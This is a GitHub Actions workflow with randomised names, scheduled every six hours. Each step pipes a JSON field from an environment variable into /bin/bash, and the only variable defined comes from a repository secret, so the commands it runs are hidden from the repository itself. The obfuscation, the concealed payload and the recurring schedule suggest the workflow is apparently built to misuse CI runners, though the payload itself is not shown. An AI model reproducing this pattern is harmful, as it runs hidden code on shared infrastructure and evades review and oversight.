name: lingzunqianlz

on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lingzunqianlz
        env:
          yvbx6787: ${{ secrets.yvbx6787 }}
        run: |
          echo $yvbx6787 | jq -r .arju7295 | /bin/bash
          echo $uug605 | jq -r .a0379 | /bin/bash
          echo $lmab7 | jq -r .yvag76325 | /bin/bash
          echo $bfm3 | jq -r .sjaa04304 | /bin/bash
          echo $afm60729 | jq -r .wps40 | /bin/bash
          echo $gvorv40 | jq -r .fm45262 | /bin/bash
          echo $ofxjb86 | jq -r .ckpnb93985 | /bin/bash
          echo $enmg0 | jq -r .awyo2923 | /bin/bash
          echo $ujzfw73 | jq -r .njl8021 | /bin/bash
          echo $kzffm4 | jq -r .poxou6 | /bin/bash

